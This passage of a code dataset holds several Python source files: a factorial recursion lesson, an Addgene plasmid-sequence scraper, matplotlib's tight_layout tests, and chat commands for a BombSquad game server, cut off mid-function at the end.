is a programming technique in which a function calls itself,\nunder a condition different from the initial one. The main goal of using recursion\nis to reduce the complexity of algorithms.\n\"\"\"\n\ndef fatorial_iter(num):\n    \"\"\"\n    Computes the factorial of a number, using an ITERATIVE (non-recursive) algorithm\n    \"\"\"\n    if num < 0:\n        raise Exception(\"ERROR: negative number, calculation impossible\")\n    \n    resposta = 1\n\n    for n in range(num, 0, -1):\n        resposta *= n\n\n    return resposta\n\ndef fatorial_rec(num):\n    \"\"\"\n    Factorial calculation, using a RECURSIVE algorithm\n    \"\"\"\n    # It is not possible to compute the factorial of a negative number\n    if num < 0:\n        raise Exception(\"ERROR: negative number, calculation impossible\")\n    \n    if num <=1: return 1 # The factorial of 0 and 1 is 1\n    else: return num * fatorial_rec(num-1) # Recursive call to the function\n##############################################################\n\nprint(f\"Factorial of 6: {fatorial_iter(6)}\")\nprint(f\"Factorial of 6: {fatorial_rec(6)}\")","repo_name":"EduardoVBF/ed-not-2023-2","sub_path":"10_recursividade.py","file_name":"10_recursividade.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"pt","doc_type":"code","dataset":"github-code","pt":"5"} +{"seq_id":"6780191846","text":"from bs4 import Tag\nfrom enum import Enum\nfrom helpers import build_url\nfrom requests import get\nfrom scrapers.scraper import BaseScraper\nfrom typing import List, Iterator, Tuple, Mapping\n\n\nclass FileType(Enum):\n    \"\"\" Represents available sequence filetypes \"\"\"\n    SNAPGENE = 'snapgene'\n    GENBANK = 'genbank'\n\n\nclass SequenceType(Enum):\n    ADDGENE_FULL = 'addgene_full'\n    ADDGENE_PARTIAL = 'addgene_partial'\n    DEPOSITOR_FULL = 'depositor_full'\n    DEPOSITOR_PARTIAL = 'depositor_partial'\n\n\nclass SequenceScraper(BaseScraper):\n    \"\"\" Download associated GenBank / SnapGene file from sequences page on plasmid page \"\"\"\n\n    def __init__(self, endpoint: str):\n        \"\"\" Create scraper class from sequence URL \"\"\"\n        super().__init__(build_url(endpoint))\n\n    def _is_sequence_page(self) -> bool:\n        \"\"\" Helper function to detect if page is for vector sequence data\n\n        Returns\n            `True` if page contains correct links\n            `False` if page is incorrect\n        \"\"\"\n        if [i for i in _get_files_list(self.soup)]:\n            return True\n        return False\n\n    def get_best(self, filetype: FileType) -> bytes:\n        \"\"\" Get best available sequence\n\n        Returns\n            The best available SnapGene or Genbank file is returned.\n\n        See Also\n            [`SequenceScraper.best_sequence`]\n        \"\"\"\n        response = get(self.best_sequence(filetype))\n        return response.content\n\n    def best_sequence(self, filetype: FileType) -> str:\n        \"\"\" Get the link to the best available sequence.\n\n        This is the priority of sequence types:\n            - depositor's full sequence\n            - AddGene's full sequence\n            - depositor's partial sequence\n            - AddGene's partial sequence\n\n        The first sequence of any type is returned\n\n        Returns\n            The best available sequence is returned\n        \"\"\"\n        if self._has_full_sequence():\n            links = self._full_links(filetype)\n            for sequence in (SequenceType.DEPOSITOR_FULL, SequenceType.ADDGENE_FULL):\n                if sequence in links.keys():\n                    # there is usually only one full sequence, but it is still wrapped in an array\n                    return links[sequence][0]\n        else:\n            links = self._partial_links(filetype)\n            for sequence in (SequenceType.DEPOSITOR_PARTIAL, SequenceType.ADDGENE_PARTIAL):\n                if sequence in links.keys():\n                    # return the first available partial sequence\n                    return links[sequence][0]\n\n    def _has_full_sequence(self) -> bool:\n        \"\"\" Check to see if there is a full sequence available.\n\n        Returns\n            `True` if 
there are full sequences available\n `False` if there are no full sequences available\n \"\"\"\n # checking both for assurance\n if self._full_links(FileType.GENBANK) == {} and self._full_links(FileType.SNAPGENE) == {}:\n return False\n return True\n\n def _full_links(self, filetype: FileType) -> Mapping[SequenceType, List[str]]:\n # partition HTML sections for full sequences\n # each section represents sequence type. More than one link may be extracted.\n sections = {}\n for _type, section in self._sequence_sections():\n if _type is SequenceType.DEPOSITOR_FULL or _type is SequenceType.ADDGENE_FULL:\n sections[_type] = section\n\n return _extract_links_from_sections(sections, filetype)\n\n def _partial_links(self, filetype: FileType) -> Mapping[SequenceType, List[str]]:\n # partition HTML sections for full sequences\n # each section represents sequence type. More than one link may be extracted.\n sections = {}\n for _type, section in self._sequence_sections():\n if _type is SequenceType.DEPOSITOR_PARTIAL or _type is SequenceType.ADDGENE_PARTIAL:\n sections[_type] = section\n\n return _extract_links_from_sections(sections, filetype)\n\n def _sequence_sections(self) -> Iterator[Tuple[SequenceType, Tag]]:\n terms = [\n ('depositor-full', SequenceType.DEPOSITOR_FULL),\n ('addgene-full', SequenceType.ADDGENE_FULL),\n ('depositor-partial', SequenceType.DEPOSITOR_PARTIAL),\n ('addgene-partial', SequenceType.ADDGENE_PARTIAL),\n ]\n for _id, _type in terms:\n element = self.soup.find('section', attrs={'id': _id})\n if element is not None:\n yield _type, element\n\n def available_sequences(self) -> List[SequenceType]:\n \"\"\" Show available sequence types for given plasmid\n\n Although some plasmids may have more than one partial sequence, only one `SequenceType` is returned\n regardless of the amount of sequences. For example [this plasmid](https://www.addgene.org/45789/sequences/)\n has one full sequence from depositor and 5 partial sequences by AddGene. However, only `[ADDGENE_PARTIAL,\n DEPOSITOR_FULL]` is returned.\n \"\"\"\n available = []\n for _type, element in self._sequence_sections():\n if element is not None:\n available.append(_type)\n return available\n\n\ndef _get_link_from_text(tag: Tag, text: str) -> str:\n \"\"\" Get the link for an anchor element that contains the given text\n\n Example:\n tag = \"
firstsecond\"\n assert _get_link_from_text(tag, 'first') == 'example.com'\n assert _get_link_from_text(tag, 'second') == 'testing.com'\n \"\"\"\n for a in tag.find_all('a'):\n if text in a.text.lower():\n if 'href' in a.attrs.keys():\n return a.attrs['href']\n else:\n raise ValueError('\\'a\\' element has no href')\n raise ValueError(f'No element with \\'{text}\\' found')\n\n\ndef _get_files_list(root: Tag) -> Iterator[Tag]:\n \"\"\" Get file list element.\n\n Returns\n `Tag` with file list element if page has sequence data\n\n Raises\n `ValueError` when downloaded page does not contain 'download-files-list' element\n \"\"\"\n divs = root.find_all('div')\n\n for div in divs:\n if 'id' in div.attrs.keys():\n if 'download-files-list' in div.attrs['id']:\n yield div\n\n\ndef _extract_links_from_sections(sections: Mapping[SequenceType, Tag], filetype: FileType):\n links = {}\n for _type, section in sections.items():\n _section_links = []\n sequences = _get_files_list(section)\n for sequence in sequences:\n _link = _get_link_from_text(sequence, filetype.value)\n _section_links.append(_link)\n links[_type] = _section_links\n\n return links\n","repo_name":"PoorRican/addgene_scraper","sub_path":"scrapers/sequence.py","file_name":"sequence.py","file_ext":"py","file_size_in_byte":6696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7963937107","text":"import warnings\n\nimport numpy as np\nfrom numpy.testing import assert_array_equal\nimport pytest\n\nimport matplotlib as mpl\nfrom matplotlib.testing.decorators import image_comparison\nimport matplotlib.pyplot as plt\nfrom matplotlib.offsetbox import AnchoredOffsetbox, DrawingArea\nfrom matplotlib.patches import Rectangle\n\n\ndef example_plot(ax, fontsize=12):\n ax.plot([1, 2])\n ax.locator_params(nbins=3)\n ax.set_xlabel('x-label', fontsize=fontsize)\n ax.set_ylabel('y-label', fontsize=fontsize)\n ax.set_title('Title', fontsize=fontsize)\n\n\n@image_comparison(['tight_layout1'], tol=1.9)\ndef test_tight_layout1():\n \"\"\"Test tight_layout for a single subplot.\"\"\"\n fig, ax = plt.subplots()\n example_plot(ax, fontsize=24)\n plt.tight_layout()\n\n\n@image_comparison(['tight_layout2'])\ndef test_tight_layout2():\n \"\"\"Test tight_layout for multiple subplots.\"\"\"\n fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(nrows=2, ncols=2)\n example_plot(ax1)\n example_plot(ax2)\n example_plot(ax3)\n example_plot(ax4)\n plt.tight_layout()\n\n\n@image_comparison(['tight_layout3'])\ndef test_tight_layout3():\n \"\"\"Test tight_layout for multiple subplots.\"\"\"\n ax1 = plt.subplot(221)\n ax2 = plt.subplot(223)\n ax3 = plt.subplot(122)\n example_plot(ax1)\n example_plot(ax2)\n example_plot(ax3)\n plt.tight_layout()\n\n\n@image_comparison(['tight_layout4'], freetype_version=('2.5.5', '2.6.1'),\n tol=0.015)\ndef test_tight_layout4():\n \"\"\"Test tight_layout for subplot2grid.\"\"\"\n ax1 = plt.subplot2grid((3, 3), (0, 0))\n ax2 = plt.subplot2grid((3, 3), (0, 1), colspan=2)\n ax3 = plt.subplot2grid((3, 3), (1, 0), colspan=2, rowspan=2)\n ax4 = plt.subplot2grid((3, 3), (1, 2), rowspan=2)\n example_plot(ax1)\n example_plot(ax2)\n example_plot(ax3)\n example_plot(ax4)\n plt.tight_layout()\n\n\n@image_comparison(['tight_layout5'])\ndef test_tight_layout5():\n \"\"\"Test tight_layout for image.\"\"\"\n ax = plt.subplot()\n arr = np.arange(100).reshape((10, 10))\n ax.imshow(arr, interpolation=\"none\")\n plt.tight_layout()\n\n\n@image_comparison(['tight_layout6'])\ndef test_tight_layout6():\n \"\"\"Test 
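# Editor's note — a self-contained check of the anchor-text lookup pattern implemented
# in _get_link_from_text above, assuming BeautifulSoup is installed; the HTML snippet
# is invented for the demo.
from bs4 import BeautifulSoup

html = '<a href="example.com">first</a><a href="testing.com">second</a>'
soup = BeautifulSoup(html, 'html.parser')
links = {a.text.lower(): a.attrs['href'] for a in soup.find_all('a') if 'href' in a.attrs}
assert links['first'] == 'example.com'
assert links['second'] == 'testing.com'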
tight_layout for gridspec.\"\"\"\n\n # This raises warnings since tight layout cannot\n # do this fully automatically. But the test is\n # correct since the layout is manually edited\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", UserWarning)\n fig = plt.figure()\n\n gs1 = mpl.gridspec.GridSpec(2, 1)\n ax1 = fig.add_subplot(gs1[0])\n ax2 = fig.add_subplot(gs1[1])\n\n example_plot(ax1)\n example_plot(ax2)\n\n gs1.tight_layout(fig, rect=[0, 0, 0.5, 1])\n\n gs2 = mpl.gridspec.GridSpec(3, 1)\n\n for ss in gs2:\n ax = fig.add_subplot(ss)\n example_plot(ax)\n ax.set_title(\"\")\n ax.set_xlabel(\"\")\n\n ax.set_xlabel(\"x-label\", fontsize=12)\n\n gs2.tight_layout(fig, rect=[0.5, 0, 1, 1], h_pad=0.45)\n\n top = min(gs1.top, gs2.top)\n bottom = max(gs1.bottom, gs2.bottom)\n\n gs1.tight_layout(fig, rect=[None, 0 + (bottom-gs1.bottom),\n 0.5, 1 - (gs1.top-top)])\n gs2.tight_layout(fig, rect=[0.5, 0 + (bottom-gs2.bottom),\n None, 1 - (gs2.top-top)],\n h_pad=0.45)\n\n\n@image_comparison(['tight_layout7'], tol=1.9)\ndef test_tight_layout7():\n # tight layout with left and right titles\n fontsize = 24\n fig, ax = plt.subplots()\n ax.plot([1, 2])\n ax.locator_params(nbins=3)\n ax.set_xlabel('x-label', fontsize=fontsize)\n ax.set_ylabel('y-label', fontsize=fontsize)\n ax.set_title('Left Title', loc='left', fontsize=fontsize)\n ax.set_title('Right Title', loc='right', fontsize=fontsize)\n plt.tight_layout()\n\n\n@image_comparison(['tight_layout8'])\ndef test_tight_layout8():\n \"\"\"Test automatic use of tight_layout.\"\"\"\n fig = plt.figure()\n fig.set_layout_engine(layout='tight', pad=0.1)\n ax = fig.add_subplot()\n example_plot(ax, fontsize=24)\n fig.draw_without_rendering()\n\n\n@image_comparison(['tight_layout9'])\ndef test_tight_layout9():\n # Test tight_layout for non-visible subplots\n # GH 8244\n f, axarr = plt.subplots(2, 2)\n axarr[1][1].set_visible(False)\n plt.tight_layout()\n\n\ndef test_outward_ticks():\n \"\"\"Test automatic use of tight_layout.\"\"\"\n fig = plt.figure()\n ax = fig.add_subplot(221)\n ax.xaxis.set_tick_params(tickdir='out', length=16, width=3)\n ax.yaxis.set_tick_params(tickdir='out', length=16, width=3)\n ax.xaxis.set_tick_params(\n tickdir='out', length=32, width=3, tick1On=True, which='minor')\n ax.yaxis.set_tick_params(\n tickdir='out', length=32, width=3, tick1On=True, which='minor')\n ax.xaxis.set_ticks([0], minor=True)\n ax.yaxis.set_ticks([0], minor=True)\n ax = fig.add_subplot(222)\n ax.xaxis.set_tick_params(tickdir='in', length=32, width=3)\n ax.yaxis.set_tick_params(tickdir='in', length=32, width=3)\n ax = fig.add_subplot(223)\n ax.xaxis.set_tick_params(tickdir='inout', length=32, width=3)\n ax.yaxis.set_tick_params(tickdir='inout', length=32, width=3)\n ax = fig.add_subplot(224)\n ax.xaxis.set_tick_params(tickdir='out', length=32, width=3)\n ax.yaxis.set_tick_params(tickdir='out', length=32, width=3)\n plt.tight_layout()\n # These values were obtained after visual checking that they correspond\n # to a tight layouting that did take the ticks into account.\n ans = [[[0.091, 0.607], [0.433, 0.933]],\n [[0.579, 0.607], [0.922, 0.933]],\n [[0.091, 0.140], [0.433, 0.466]],\n [[0.579, 0.140], [0.922, 0.466]]]\n for nn, ax in enumerate(fig.axes):\n assert_array_equal(np.round(ax.get_position().get_points(), 3),\n ans[nn])\n\n\ndef add_offsetboxes(ax, size=10, margin=.1, color='black'):\n \"\"\"\n Surround ax with OffsetBoxes\n \"\"\"\n m, mp = margin, 1+margin\n anchor_points = [(-m, -m), (-m, .5), (-m, mp),\n (mp, .5), (.5, mp), (mp, mp),\n 
(.5, -m), (mp, -m), (.5, -m)]\n for point in anchor_points:\n da = DrawingArea(size, size)\n background = Rectangle((0, 0), width=size,\n height=size,\n facecolor=color,\n edgecolor='None',\n linewidth=0,\n antialiased=False)\n da.add_artist(background)\n\n anchored_box = AnchoredOffsetbox(\n loc='center',\n child=da,\n pad=0.,\n frameon=False,\n bbox_to_anchor=point,\n bbox_transform=ax.transAxes,\n borderpad=0.)\n ax.add_artist(anchored_box)\n return anchored_box\n\n\n@image_comparison(['tight_layout_offsetboxes1', 'tight_layout_offsetboxes2'])\ndef test_tight_layout_offsetboxes():\n # 1.\n # - Create 4 subplots\n # - Plot a diagonal line on them\n # - Surround each plot with 7 boxes\n # - Use tight_layout\n # - See that the squares are included in the tight_layout\n # and that the squares in the middle do not overlap\n #\n # 2.\n # - Make the squares around the right side axes invisible\n # - See that the invisible squares do not affect the\n # tight_layout\n rows = cols = 2\n colors = ['red', 'blue', 'green', 'yellow']\n x = y = [0, 1]\n\n def _subplots():\n _, axs = plt.subplots(rows, cols)\n axs = axs.flat\n for ax, color in zip(axs, colors):\n ax.plot(x, y, color=color)\n add_offsetboxes(ax, 20, color=color)\n return axs\n\n # 1.\n axs = _subplots()\n plt.tight_layout()\n\n # 2.\n axs = _subplots()\n for ax in (axs[cols-1::rows]):\n for child in ax.get_children():\n if isinstance(child, AnchoredOffsetbox):\n child.set_visible(False)\n\n plt.tight_layout()\n\n\ndef test_empty_layout():\n \"\"\"Test that tight layout doesn't cause an error when there are no axes.\"\"\"\n fig = plt.gcf()\n fig.tight_layout()\n\n\n@pytest.mark.parametrize(\"label\", [\"xlabel\", \"ylabel\"])\ndef test_verybig_decorators(label):\n \"\"\"Test that no warning emitted when xlabel/ylabel too big.\"\"\"\n fig, ax = plt.subplots(figsize=(3, 2))\n ax.set(**{label: 'a' * 100})\n\n\ndef test_big_decorators_horizontal():\n \"\"\"Test that doesn't warn when xlabel too big.\"\"\"\n fig, axs = plt.subplots(1, 2, figsize=(3, 2))\n axs[0].set_xlabel('a' * 30)\n axs[1].set_xlabel('b' * 30)\n\n\ndef test_big_decorators_vertical():\n \"\"\"Test that doesn't warn when ylabel too big.\"\"\"\n fig, axs = plt.subplots(2, 1, figsize=(3, 2))\n axs[0].set_ylabel('a' * 20)\n axs[1].set_ylabel('b' * 20)\n\n\ndef test_badsubplotgrid():\n # test that we get warning for mismatched subplot grids, not than an error\n plt.subplot2grid((4, 5), (0, 0))\n # this is the bad entry:\n plt.subplot2grid((5, 5), (0, 3), colspan=3, rowspan=5)\n with pytest.warns(UserWarning):\n plt.tight_layout()\n\n\ndef test_collapsed():\n # test that if the amount of space required to make all the axes\n # decorations fit would mean that the actual Axes would end up with size\n # zero (i.e. 
margins add up to more than the available width) that a call\n # to tight_layout will not get applied:\n fig, ax = plt.subplots(tight_layout=True)\n ax.set_xlim([0, 1])\n ax.set_ylim([0, 1])\n\n ax.annotate('BIG LONG STRING', xy=(1.25, 2), xytext=(10.5, 1.75),\n annotation_clip=False)\n p1 = ax.get_position()\n with pytest.warns(UserWarning):\n plt.tight_layout()\n p2 = ax.get_position()\n assert p1.width == p2.width\n # test that passing a rect doesn't crash...\n with pytest.warns(UserWarning):\n plt.tight_layout(rect=[0, 0, 0.8, 0.8])\n\n\ndef test_suptitle():\n fig, ax = plt.subplots(tight_layout=True)\n st = fig.suptitle(\"foo\")\n t = ax.set_title(\"bar\")\n fig.canvas.draw()\n assert st.get_window_extent().y0 > t.get_window_extent().y1\n\n\n@pytest.mark.backend(\"pdf\")\ndef test_non_agg_renderer(monkeypatch, recwarn):\n unpatched_init = mpl.backend_bases.RendererBase.__init__\n\n def __init__(self, *args, **kwargs):\n # Check that we don't instantiate any other renderer than a pdf\n # renderer to perform pdf tight layout.\n assert isinstance(self, mpl.backends.backend_pdf.RendererPdf)\n unpatched_init(self, *args, **kwargs)\n\n monkeypatch.setattr(mpl.backend_bases.RendererBase, \"__init__\", __init__)\n fig, ax = plt.subplots()\n fig.tight_layout()\n\n\ndef test_manual_colorbar():\n # This should warn, but not raise\n fig, axes = plt.subplots(1, 2)\n pts = axes[1].scatter([0, 1], [0, 1], c=[1, 5])\n ax_rect = axes[1].get_position()\n cax = fig.add_axes(\n [ax_rect.x1 + 0.005, ax_rect.y0, 0.015, ax_rect.height]\n )\n fig.colorbar(pts, cax=cax)\n with pytest.warns(UserWarning, match=\"This figure includes Axes\"):\n fig.tight_layout()\n\n\ndef test_clipped_to_axes():\n # Ensure that _fully_clipped_to_axes() returns True under default\n # conditions for all projection types. 
Axes.get_tightbbox()\n # uses this to skip artists in layout calculations.\n arr = np.arange(100).reshape((10, 10))\n fig = plt.figure(figsize=(6, 2))\n ax1 = fig.add_subplot(131, projection='rectilinear')\n ax2 = fig.add_subplot(132, projection='mollweide')\n ax3 = fig.add_subplot(133, projection='polar')\n for ax in (ax1, ax2, ax3):\n # Default conditions (clipped by ax.bbox or ax.patch)\n ax.grid(False)\n h, = ax.plot(arr[:, 0])\n m = ax.pcolor(arr)\n assert h._fully_clipped_to_axes()\n assert m._fully_clipped_to_axes()\n # Non-default conditions (not clipped by ax.patch)\n rect = Rectangle((0, 0), 0.5, 0.5, transform=ax.transAxes)\n h.set_clip_path(rect)\n m.set_clip_path(rect.get_path(), rect.get_transform())\n assert not h._fully_clipped_to_axes()\n assert not m._fully_clipped_to_axes()\n\n\ndef test_tight_pads():\n fig, ax = plt.subplots()\n with pytest.warns(PendingDeprecationWarning,\n match='will be deprecated'):\n fig.set_tight_layout({'pad': 0.15})\n fig.draw_without_rendering()\n\n\ndef test_tight_kwargs():\n fig, ax = plt.subplots(tight_layout={'pad': 0.15})\n fig.draw_without_rendering()\n\n\ndef test_tight_toggle():\n fig, ax = plt.subplots()\n with pytest.warns(PendingDeprecationWarning):\n fig.set_tight_layout(True)\n assert fig.get_tight_layout()\n fig.set_tight_layout(False)\n assert not fig.get_tight_layout()\n fig.set_tight_layout(True)\n assert fig.get_tight_layout()\n","repo_name":"matplotlib/matplotlib","sub_path":"lib/matplotlib/tests/test_tightlayout.py","file_name":"test_tightlayout.py","file_ext":"py","file_size_in_byte":12704,"program_lang":"python","lang":"en","doc_type":"code","stars":18437,"dataset":"github-code","pt":"5"} +{"seq_id":"44454516188","text":"import ba\nfrom _ba import chatmessage\nimport _ba\n\nfrom bd.chat.commands_engine import servercommand, _handlers\nfrom bd.playerdata import PlayerData, Status, get_player_by\nfrom bd.locale import get_locale\n\n\n@servercommand('help'.split(), {Status.ADMIN: 0, Status.VIP: 0})\ndef help_callback(playerdata: PlayerData, args):\n for handler in _handlers:\n chatmessage(\"{} - {}\".format(\n handler.commands[0],\n get_locale('command_help').get(\n handler.commands[0],\n get_locale('command_help_not_found'))))\n\n\n@servercommand('list l'.split(), {Status.ADMIN: 0, Status.VIP: 0})\ndef list_callback(playerdata: PlayerData, args):\n client_ids = [(\n i['players'][0]['name_full'] if i['players'] else\n i['displayString'], str(i['client_id']))\n for i in _ba.get_game_roster()]\n\n chatmessage(get_locale('player_ids_text'))\n activity = _ba.get_foreground_host_activity()\n for i in range(len(activity.players)):\n p = activity.players[i]\n chatmessage('{} | {} | {}'.format(i, p.getname().ljust(15), p.sessionplayer.inputdevice.client_id))\n chatmessage(get_locale('dividing_strip_text'))\n\n\n@servercommand('kick'.split(), {Status.ADMIN: 0, Status.VIP: 60})\ndef kick_callback(playerdata: PlayerData, args):\n if len(args) < 2 or (not args[1].isdigit() and args[1] != '-1'):\n chatmessage(get_locale('chat_command_not_args_error'))\n elif args[1] == '-1':\n chatmessage(get_locale('kick_host_error'))\n else:\n ban_time = 300\n clients_ids = [player['client_id'] for player in\n _ba.get_game_roster()]\n if len(args) > 1 and playerdata.status == Status.ADMIN:\n ban_time = int(args[1])\n elif len(args) > 1 and playerdata.status != Status.ADMIN:\n chatmessage(get_locale('time_arg_access_error'))\n\n if int(args[1]) in clients_ids:\n target = get_player_by('client_id', int(args[1]))\n if target.status == Status.ADMIN:\n 
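# Editor's note — a tiny standalone variant of the tight-layout usage exercised in the
# tests above; the figure contents are placeholders chosen for the demo, and the Agg
# backend is selected so the snippet runs headless.
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt

fig, ax = plt.subplots()
ax.plot([1, 2])
ax.set_xlabel('x-label')
fig.tight_layout(pad=0.4)      # pad is in multiples of the font size
fig.draw_without_rendering()   # trigger layout without opening a window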
chatmessage(get_locale('kick_admin_error'))\n else:\n _ba.disconnect_client(int(args[1]),\n ban_time=ban_time)\n else:\n chatmessage(get_locale('not_player_error'))\n\n\n@servercommand('remove'.split(), {Status.ADMIN: 0, Status.VIP: 60})\ndef remove_callback(playerdata: PlayerData, args):\n activity = ba.getactivity()\n if len(args) < 2:\n chatmessage(get_locale('chat_command_not_args_error'))\n elif args[1] == 'all' and playerdata.status == Status.ADMIN:\n for player in activity.players:\n player.sessionplayer.remove_from_game()\n else:\n activity.players[int(args[1])].sessionplayer.remove_from_game()\n\n\n@servercommand('end'.split(), {Status.ADMIN: 0, Status.VIP: 120})\ndef end_callback(playerdata: PlayerData, args):\n activity = ba.getactivity()\n assert isinstance(activity, ba.GameActivity)\n activity.end_game()\n\n\n@servercommand('ooh'.split(), {Status.ADMIN: 0, Status.VIP: 60})\ndef ooh_callback(playerdata: PlayerData, args):\n ba.playsound(ba.getsound('ooh'), volume=2)\n\n\n@servercommand('playsound ps'.split(), {Status.ADMIN: 0, Status.VIP: 0})\ndef play_sound_callback(playerdata: PlayerData, args):\n if len(args) < 2:\n chatmessage(get_locale('chat_command_not_args_error'))\n else:\n ba.playsound(ba.getsound(str(args[0])), volume=2)\n\n\n@servercommand('nv'.split(), {Status.ADMIN: 0, Status.VIP: 0})\ndef nv_callback(playerdata: PlayerData, args):\n activity = ba.getactivity()\n tint = {0: activity.globalsnode.tint,\n 1: (0.5, 0.7, 1.0)}\n ba.animate_array(activity.globalsnode, 'tint', 3, tint)\n\n\n@servercommand('dv'.split(), {Status.ADMIN: 0, Status.VIP: 0})\ndef dv_callback(playerdata: PlayerData, args):\n tint = {0: ba.getactivity().globalsnode.tint,\n 1: (1.0, 1.0, 1.0)}\n\n ba.animate_array(ba.getactivity().globalsnode, 'tint', 3, tint)\n\n\n@servercommand('box tnt'.split(), {Status.ADMIN: 0, Status.VIP: 0})\ndef box_callback(playerdata: PlayerData, args):\n from bastd.actor.playerspaz import PlayerSpaz\n\n def do_box(player):\n if player.actor and isinstance(player.actor, PlayerSpaz) and player.actor.node:\n player.actor.node.torso_model = ba.getmodel('tnt')\n player.actor.node.color_mask_texture = ba.gettexture('tnt')\n player.actor.node.color_texture = ba.gettexture('tnt')\n player.actor.node.highlight = (1, 1, 1)\n player.actor.node.color = (1, 1, 1)\n player.actor.node.head_model = None\n player.actor.node.style = 'cyborg'\n\n activity = ba.getactivity()\n if len(args) < 2:\n chatmessage(get_locale('chat_command_not_args_error'))\n elif args[1] == 'all' and playerdata.status == Status.ADMIN:\n for iplayer in activity.players:\n do_box(iplayer)\n else:\n try:\n iplayer = activity.players[int(args[1])]\n do_box(iplayer)\n except (IndexError, ValueError):\n chatmessage(get_locale('not_player_error'))\n\n\n@servercommand('hug'.split(), {Status.VIP: 10, Status.ADMIN: 0})\ndef hug_callback(playerdata: PlayerData, args):\n def do_hug(p1: ba.Player, p2: ba.Player):\n from bastd.actor.playerspaz import PlayerSpaz\n if (p1.actor.is_alive() and isinstance(p1.actor, PlayerSpaz) and\n p2.actor.is_alive() and isinstance(p2.actor, PlayerSpaz)):\n p1.actor.node.hold_node = p2.actor.node\n p2.actor.node.hold_node = p1.actor.node\n\n activity = ba.getactivity()\n if len(args) == 1:\n alives = []\n for i in range(len(activity.players)):\n if activity.players[i]:\n alives.append(i)\n count = len(alives) // 2\n for i in range(count):\n do_hug(activity.players[alives[i]], activity.players[alives[count + i]])\n elif len(args) == 3:\n try:\n do_hug(activity.players[int(args[1])], 
activity.players[int(args[2])])\n except (IndexError, ValueError):\n chatmessage(get_locale('not_player_error'))\n\n\n@servercommand('tint'.split(), {Status.VIP: 0, Status.ADMIN: 0})\ndef tint_callback(playerdata: PlayerData, args):\n if len(args) < 2 or (len(args) < 4 and args[1] != 'r'):\n chatmessage(get_locale('chat_command_not_args_error'))\n elif args[1] == 'r':\n m = 1.30 if len(args) < 3 else float(args[2])\n s = 1000 if len(args) < 4 else float(args[3])\n if m > 3 and playerdata.status != Status.ADMIN:\n chatmessage(get_locale('too_big_arg_error'))\n return\n tint = {\n s * 0: (m, 0, 0),\n s * 1: (0, m, 0),\n s * 2: (0, 0, m),\n s * 3: (m, 0, 0),\n }\n\n ba.animate_array(ba.getactivity().globalsnode,\n 'tint', 3, tint, True, suppress_format_warning=True,\n timeformat=ba.TimeFormat.MILLISECONDS)\n else:\n color = (float(args[1]),\n float(args[2]),\n float(args[3]))\n if max(map(abs, color)) > 3 and playerdata.status != Status.ADMIN:\n chatmessage(get_locale('too_big_arg_error'))\n return\n ba.getactivity().globalsnode.tint = color\n\n\n@servercommand('sm'.split(), {Status.ADMIN: 0, Status.VIP: 0})\ndef sm_callback(playerdata: PlayerData, args):\n if not ba.getactivity().globalsnode.slow_motion:\n ba.getactivity().globalsnode.slow_motion = True\n else:\n ba.getactivity().globalsnode.slow_motion = False\n\n\n@servercommand('gp'.split(), {Status.VIP: 0, Status.ADMIN: 0})\ndef gp_callback(playerdata: PlayerData, args):\n activity = ba.getactivity()\n if len(args) < 2:\n chatmessage(get_locale('chat_command_not_args_error'))\n else:\n chatmessage(get_locale('player_profiles_text'))\n try:\n inputdevice = activity.players[int(args[1])].sessionplayer.inputdevice\n except (IndexError, ValueError):\n chatmessage(get_locale('not_player_error'))\n return\n profiles = inputdevice.get_player_profiles()\n\n for profile in profiles:\n if profile == '__account__':\n profile = inputdevice.get_account_name(False)\n chatmessage(profile)\n\n chatmessage(get_locale('dividing_strip_text'))\n\n\n@servercommand('fly'.split(), {Status.VIP: 60, Status.ADMIN: 0})\ndef fly_callback(playerdata: PlayerData, args):\n from bastd.actor.playerspaz import PlayerSpaz\n activity = ba.getactivity()\n if not args:\n chatmessage(get_locale('chat_command_not_args_error'))\n elif args[1] == 'all' and playerdata.status == Status.ADMIN:\n for player in activity.players:\n if player.actor and isinstance(player.actor, PlayerSpaz):\n player.actor.node.fly = True\n else:\n try:\n player = activity.players[int(args[1])]\n except (IndexError, ValueError):\n chatmessage(get_locale('not_player_error'))\n return\n if player.actor and hasattr(player.actor, 'node'):\n if not player.actor.node.fly:\n player.actor.node.fly = True\n else:\n player.actor.node.fly = False\n\n\n@servercommand('ac'.split(), {Status.ADMIN: 0, Status.VIP: 0})\ndef ac_callback(playerdata: PlayerData, args):\n if not args:\n chatmessage(get_locale('chat_command_not_args_error'))\n elif args[1] == 'r':\n m = 1.30 if len(args) < 3 else float(args[2])\n s = 1000 if len(args) < 4 else float(args[3])\n ambient_color = {\n s * 0: (m, 0, 0),\n s * 1: (0, m, 0),\n s * 2: (0, 0, m),\n s * 3: (m, 0, 0)\n }\n\n ba.animate_array(ba.getactivity().globalsnode,\n 'ambient_color', 3, ambient_color, True, suppress_format_warning=True,\n timeformat=ba.TimeFormat.MILLISECONDS)\n else:\n ba.getactivity().globalsnode.ambientColor = (float(args[1]),\n float(args[2]),\n float(args[3]))\n\n\n@servercommand('io iceoff'.split(), statuses={Status.ADMIN: 0, Status.VIP: 0})\ndef 
ice_off_callback(playerdata: PlayerData, args):\n from bastd.gameutils import SharedObjects\n shared = SharedObjects.get()\n activity = ba.getactivity()\n assert isinstance(activity, ba.GameActivity)\n activity.map.is_hockey = False\n activity.map.node.materials = [shared.footing_material]\n activity.map.floor.materials = [shared.footing_material]\n\n\n@servercommand('heal'.split(), {Status.VIP: 10, Status.ADMIN: 0})\ndef heal_callback(playerdata: PlayerData, args):\n activity = ba.getactivity()\n if len(args) < 2:\n chatmessage(get_locale('chat_command_not_args_error'))\n elif args[1] == 'all':\n for i in activity.players:\n if i.actor and hasattr(i.actor, 'node'):\n assert isinstance(i.actor.node, ba.Node)\n i.actor.node.handlemessage(\n ba.PowerupMessage(poweruptype='health'))\n else:\n player = activity.players[int(args[0])]\n if player.actor and hasattr(player.actor, 'node'):\n assert isinstance(player.actor.node, ba.Node)\n player.actor.node.handlemessage(\n ba.PowerupMessage(poweruptype='health'))\n\n\n@servercommand('ref reflections'.split(), {Status.VIP: 0, Status.ADMIN: 0})\ndef reflections_callback(playerdata: PlayerData, args):\n activity = ba.getactivity()\n assert isinstance(activity, 